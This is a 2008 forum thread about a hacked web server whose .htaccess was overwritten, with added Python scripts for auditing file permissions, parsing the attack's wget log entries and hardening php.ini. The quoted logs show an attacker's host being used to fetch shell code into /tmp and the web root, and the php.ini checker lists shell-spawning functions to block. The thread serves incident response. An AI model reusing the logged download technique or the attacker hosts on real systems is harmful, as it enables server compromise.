Solved

Server hacked, .htaccess file was changed

Posted on 2008-06-24
744 Views
Last Modified: 2013-11-15
Hi experts,

I have a dedicated server with GoDaddy. It was attacked 3 times this morning. The .htaccess file on the server was modified and redirected to another IP: 64.28.191.117. It seems they are able to write anything to my server.
The following is the error log I got. It seems to be very helpful, but I still cannot figure out what the hole is and what I should do. Thanks a lot!

[-] prtctl: Invalid argument
[-] prtctl: Invalid argument
--06:09:21--  http://www.dr-schwab.de/shell2.txt
           => `/home/myweb/public_html/.htaccess'
Resolving www.dr-schwab.de... 82.165.104.215
Connecting to www.dr-schwab.de|82.165.104.215|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 210 [text/plain]
 
    0K                                                       100%   33.38 MB/s
 
06:09:21 (33.38 MB/s) - `/home/myweb/public_html/.htaccess' saved [210/210]

Question by:z_ruixiang
15 Comments
 
LVL 10

Expert Comment

by:Casey Herman
ID: 21856284
If this is some sort of *NIX, you can change the permissions on the file to read-only.

Casey
0
 
LVL 29

Expert Comment

by:Jan Springer
ID: 21856374
That doesn't help if there is an application that is vulnerable.

Are you using PHP?  What version?  What version of Apache?

Has GoDaddy been notified?
0
 
LVL 10

Expert Comment

by:Casey Herman
ID: 21856459
That is right because you can write code to change the file modes....

Casey
0

Author Comment

by:z_ruixiang
ID: 21856566
I have changed all the files to read only, but it didn't help.
Apache/2.0.52  running on CentOS 4.
PHP Version 4.3.9
0
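Casey's read-only suggestion and Jan's reply that it "doesn't help if there is an application that is vulnerable" come down to one rule of UNIX permissions: chmod(2) is allowed to the file's owner whatever the mode bits say, so code running as the user that owns .htaccess can always put the write bit back before overwriting it. The check a practitioner actually wants is therefore not "is the file writable right now" but "is it owned by, or writable by, the uid Apache runs as". The audit below is an added example, not something from this thread; it assumes the CentOS default of Apache running as uid/gid 48 and uses a constructed list of stat results so it runs offline, with a real-filesystem walker included for use on a live host.

```python
import os
import stat
from dataclasses import dataclass
from typing import Iterable, List, Set, Tuple


@dataclass(frozen=True)
class Entry:
    """The three things DAC needs from stat(2): permission bits, owner, group."""
    path: str
    mode: int  # stat.S_IMODE(st_mode), e.g. 0o644
    uid: int
    gid: int


def can_write(e: Entry, uid: int, gids: Set[int]) -> bool:
    """Plain UNIX discretionary access check for a write: owner bits apply if
    we own the file, otherwise group bits if we are in its group, else other."""
    if uid == 0:
        return True
    if e.uid == uid:
        return bool(e.mode & stat.S_IWUSR)
    if e.gid in gids:
        return bool(e.mode & stat.S_IWGRP)
    return bool(e.mode & stat.S_IWOTH)


def can_regain_write(e: Entry, uid: int) -> bool:
    """chmod(2) succeeds for the owner (or root) regardless of the mode bits, so
    a 'read-only' file owned by the web server uid is only read-only until the
    compromised script calls chmod on it."""
    return uid == 0 or e.uid == uid


def audit(entries: Iterable[Entry], web_uid: int, web_gids: Set[int]) -> List[Tuple[str, str]]:
    """Return (path, reason) for every entry the web server could modify."""
    findings = []
    for e in entries:
        if can_write(e, web_uid, web_gids):
            findings.append((e.path, "writable by the web server uid right now"))
        elif can_regain_write(e, web_uid):
            findings.append((e.path, "read-only but owned by the web server uid: chmod undoes it"))
    return findings


def scan_tree(root: str, web_uid: int, web_gids: Set[int]) -> List[Tuple[str, str]]:
    """Walk a real document root and audit it (not exercised by the sample below)."""
    entries = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            p = os.path.join(dirpath, name)
            st = os.lstat(p)
            entries.append(Entry(p, stat.S_IMODE(st.st_mode), st.st_uid, st.st_gid))
    return audit(entries, web_uid, web_gids)


# Constructed sample: a docroot after 'chmod 444' on .htaccess, with the site
# files owned by an ordinary account (uid 500) and Apache as uid/gid 48.
APACHE_UID, APACHE_GIDS = 48, {48}
SAMPLE_ENTRIES = [
    Entry("/home/myweb/public_html/index.php", 0o644, 500, 500),
    Entry("/home/myweb/public_html/.htaccess", 0o444, 48, 48),   # read-only, but apache owns it
    Entry("/home/myweb/public_html/uploads", 0o777, 500, 500),   # world-writable directory
    Entry("/home/myweb/public_html/config.php", 0o640, 500, 48),  # group apache, read-only for it
]


def sample_findings() -> List[Tuple[str, str]]:
    return audit(SAMPLE_ENTRIES, APACHE_UID, APACHE_GIDS)


if __name__ == "__main__":
    for path, reason in sample_findings():
        print(f"{path}: {reason}")
```

Files that the web server owns but must never change are best moved to another owner (root or the site account) with mode 644; on ext2/ext3 the root-only immutable attribute (chattr +i) blocks even the owner, because clearing it needs a capability a non-root Apache process does not have. None of this closes the hole the attacker came in through; it only limits what a foothold as the Apache user can overwrite.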
 
LVL 29

Expert Comment

by:Jan Springer
ID: 21856630
Upgrade Apache and PHP.  Run modsecurity.  Don't walk to the task, run -- before it is too late.
0
 

Author Comment

by:z_ruixiang
ID: 21856736
Will this upgrading really help? Do I need to change my code if upgraded to PHP5?
0
 
LVL 29

Expert Comment

by:Jan Springer
ID: 21856899
If you are running a release of PHP or whatever that has a security vulnerability, then, YES, you need to upgrade.  If you don't want to go to PHP5, then upgrade to the latest PHP4.  And upgrade Apache while you're at it.  Install modsecurity v2.  Review your apache config file and don't load modules such as proxying, etc if you don't need or use them.
0
 

Author Comment

by:z_ruixiang
ID: 21857153
Based on the log info, can we tell whether it's because of the Apache or PHP version? I mean, I really want to know what and where the hole is, how they could write on my server.
0
 
LVL 29

Accepted Solution

by:Jan Springer (earned 500 total points)
ID: 21857372
I'd put my 2 cents on php.  Some interesting reading:

http://isisblogs.poly.edu/2008/02/23/reverse-engineering-a-php-virus/

If it were my machine, I'd scratch it and start over.  But do check that a root kit hasn't been installed -> www.chkrootkit.org.  Look in /tmp for applications and/or data that do not belong.
0
 

Author Comment

by:z_ruixiang
ID: 21857700
I think you are right. I found this in the error log:

--06:03:54--  http://www.dr-schwab.de/shell3.c
           => `/tmp/sys.c'
Resolving www.dr-schwab.de... 82.165.104.215
Connecting to www.dr-schwab.de|82.165.104.215|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,226 (3.2K) [text/x-csrc]

    0K ...                                                   100%   21.04 KB/s

06:03:55 (21.04 KB/s) - `/tmp/sys.c' saved [3226/3226]

And there is an unknown file in my /tmp.

Is it a security vulnerability of the PHP I have? I will upgrade it.
0
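What both error-log excerpts in this thread show is wget output ending up in Apache's error_log, which happens when a process started by the web server (typically a PHP script calling exec/system) runs wget with its stderr inherited from httpd. That is why the writes land wherever the Apache user can write: the web root and /tmp. The parser below is an added example, not part of the original question or answers; it reassembles each multi-line wget transcript into one record, flags destinations a responder should care about, and lists the hosts and IPs to block and report. The sample log is constructed from the two transcripts quoted above plus one unrelated noise line; the docroot path is the one from the post.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Sequence, Set

# Constructed sample: the two transcripts quoted in this thread, in time order,
# plus one unrelated line to show that noise between transcripts is ignored.
SAMPLE_LOG = """\
[-] prtctl: Invalid argument
--06:03:54--  http://www.dr-schwab.de/shell3.c
           => `/tmp/sys.c'
Resolving www.dr-schwab.de... 82.165.104.215
Connecting to www.dr-schwab.de|82.165.104.215|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,226 (3.2K) [text/x-csrc]

    0K ...                                                   100%   21.04 KB/s

06:03:55 (21.04 KB/s) - `/tmp/sys.c' saved [3226/3226]
PHP Warning:  some unrelated warning line (constructed noise)
--06:09:21--  http://www.dr-schwab.de/shell2.txt
           => `/home/myweb/public_html/.htaccess'
Resolving www.dr-schwab.de... 82.165.104.215
Connecting to www.dr-schwab.de|82.165.104.215|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 210 [text/plain]

    0K                                                       100%   33.38 MB/s

06:09:21 (33.38 MB/s) - `/home/myweb/public_html/.htaccess' saved [210/210]
"""

# Line shapes produced by wget 1.x when its stderr is not a terminal.
START_RE = re.compile(r"^--(\d\d:\d\d:\d\d)--\s+(\S+)$")
DEST_RE = re.compile(r"^\s*=>\s*`(.+?)'$")
RESOLVE_RE = re.compile(r"^Resolving (\S+?)\.\.\. (\d{1,3}(?:\.\d{1,3}){3})")
SAVED_RE = re.compile(r"^(\d\d:\d\d:\d\d) \(.*?\) - `(.+?)' saved \[(\d+)/(\d+)\]")

TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


@dataclass
class Download:
    started: str
    url: str
    dest: str = ""
    host: str = ""
    ip: str = ""
    size: int = 0
    complete: bool = False


def parse_wget_transcripts(log_text: str) -> List[Download]:
    """Stitch the multi-line wget transcripts in an error log into records."""
    downloads: List[Download] = []
    current: Optional[Download] = None
    for line in log_text.splitlines():
        m = START_RE.match(line)
        if m:                                   # a new fetch begins
            current = Download(started=m.group(1), url=m.group(2))
            downloads.append(current)
            continue
        if current is None:                     # noise outside a transcript
            continue
        if (m := DEST_RE.match(line)):
            current.dest = m.group(1)
        elif (m := RESOLVE_RE.match(line)):
            current.host, current.ip = m.group(1), m.group(2)
        elif (m := SAVED_RE.match(line)) and m.group(2) == current.dest:
            current.size, current.complete = int(m.group(3)), True
            current = None                      # transcript finished
    return downloads


def classify(d: Download, docroots: Sequence[str]) -> List[str]:
    """Reasons a responder should look at this download; empty means unremarkable."""
    reasons = []
    name = d.dest.rsplit("/", 1)[-1]
    url_name = d.url.rsplit("/", 1)[-1]
    if any(d.dest.startswith(root.rstrip("/") + "/") for root in docroots):
        reasons.append("written into the web root")
    if d.dest.startswith(TEMP_DIRS):
        reasons.append("staged in a world-writable temp directory")
    if name.startswith("."):
        reasons.append("hidden dotfile")
    if url_name != name:
        reasons.append(f"saved under a different name than fetched ({url_name} -> {name})")
    if name.endswith(".c"):
        # Interpretation, not something the log proves: C source dropped in /tmp
        # is normally compiled on the box, e.g. for a local privilege escalation.
        reasons.append("C source on a web host: likely compiled locally")
    return reasons


def extract_iocs(downloads: Sequence[Download]) -> Dict[str, Set[str]]:
    """Hosts, IPs and URLs to block at the firewall and report to the hoster."""
    return {
        "hosts": {d.host for d in downloads if d.host},
        "ips": {d.ip for d in downloads if d.ip},
        "urls": {d.url for d in downloads},
    }


if __name__ == "__main__":
    found = parse_wget_transcripts(SAMPLE_LOG)
    for d in found:
        print(f"{d.started} {d.url} -> {d.dest} ({d.size} bytes, complete={d.complete})")
        for r in classify(d, ["/home/myweb/public_html"]):
            print(f"    ! {r}")
    print("IOCs:", extract_iocs(found))
```

Run it as `python3 wget_log.py < /dev/null` after pointing SAMPLE_LOG at the real error_log; the records give the timeline Jan's advice depends on (the /tmp drop at 06:03 precedes the .htaccess overwrite at 06:09), and the IOC set is what to hand to GoDaddy. It does not identify the vulnerable script; for that, correlate the transcript timestamps with the access_log requests served in the same second.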
 

Author Comment

by:z_ruixiang
ID: 21857755
Could you give me some instructions on how to upgrade to PHP 5?
0
 
LVL 29

Expert Comment

by:Jan Springer
ID: 21857886
The problem with this is that applications could have been re-compiled by the hacker and you most likely have no idea which apps these are.

Move your webserver temporarily somewhere else and re-install is my suggestion.
0
 

Author Comment

by:z_ruixiang
ID: 21857961
I ran "yum update php", but it seems 4.3.9 is the latest version I can get.
0
 

Author Comment

by:z_ruixiang
ID: 21877321
What should I do to prevent it from being attacked if I get a new server? I'm not sure whether they still do that if I move to a totally new server.
0
 
LVL 29

Expert Comment

by:Jan Springer
ID: 21877468
1) install all of the latest versions of kernel and apps
2) keep a spreadsheet of current OS and application versions installed
3) subscribe to bugtraq at www.securityfocus.com
4) run modsecurity v2 with Apache 2.2.x
5) use iptables
6) periodically update and run chkrootkit -> www.chkrootkit.org
7) turn globals off in php
8) sanitize input variables to scripts and cgis
0
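Item 7 in Jan's list is the php.ini side of the problem, and it is worth checking mechanically rather than by eye. The script below is an added example, not from the thread, and goes a little beyond the list: besides register_globals it audits the settings that decide whether a compromised script can spawn wget at all (disable_functions), fetch remote URLs (allow_url_fopen) or read and write outside the site (open_basedir). The two php.ini fragments are constructed; the docroot path is the one from the post and the defaults assumed for missing keys are those of PHP 4.3.x.

```python
from typing import Dict, List, Tuple

# Functions through which a PHP script can start another program such as wget.
SHELL_FUNCTIONS = ("exec", "passthru", "shell_exec", "system", "popen", "proc_open")


def parse_php_ini(text: str) -> Dict[str, str]:
    """Minimal php.ini reader: ';' comments and [sections] skipped, last value wins."""
    settings: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        settings[key.strip().lower()] = value.strip().strip('"')
    return settings


def is_on(value: str) -> bool:
    """php.ini booleans: 1/On/True/Yes are true, everything else is false."""
    return value.strip().lower() in ("1", "on", "true", "yes")


def audit_php_ini(settings: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (directive, problem) pairs; an empty list means the checks passed."""
    findings = []
    if is_on(settings.get("register_globals", "Off")):
        findings.append(("register_globals", "On: request parameters become PHP variables"))
    if is_on(settings.get("allow_url_fopen", "On")):  # PHP's built-in default is On
        findings.append(("allow_url_fopen", "On: scripts can open remote URLs as files"))
    disabled = {f.strip().lower() for f in settings.get("disable_functions", "").split(",") if f.strip()}
    missing = [f for f in SHELL_FUNCTIONS if f not in disabled]
    if missing:
        findings.append(("disable_functions", "process-spawning functions still enabled: " + ", ".join(missing)))
    if not settings.get("open_basedir"):
        findings.append(("open_basedir", "unset: scripts may read/write anywhere the web user can"))
    return findings


# Constructed fragments: a permissive php.ini and a hardened one.
WEAK_INI = """\
[PHP]
register_globals = On
allow_url_fopen = On   ; needed by an old include
disable_functions =
display_errors = On
"""

HARDENED_INI = """\
[PHP]
register_globals = Off
allow_url_fopen = Off
disable_functions = exec,passthru,shell_exec,system,popen,proc_open
open_basedir = "/home/myweb/public_html:/tmp"
display_errors = Off
"""


def audit_text(text: str) -> List[Tuple[str, str]]:
    return audit_php_ini(parse_php_ini(text))


if __name__ == "__main__":
    for label, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(f"{label}: {audit_text(ini) or 'no findings'}")
```

Point audit_text at the output of `php -i` or the live php.ini on the new server. disable_functions and open_basedir are containment, not a fix: they make the wget-into-webroot pattern from this thread fail even if a script is still injectable, which is exactly the kind of second line of defence Jan's mod_security and iptables items are about.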
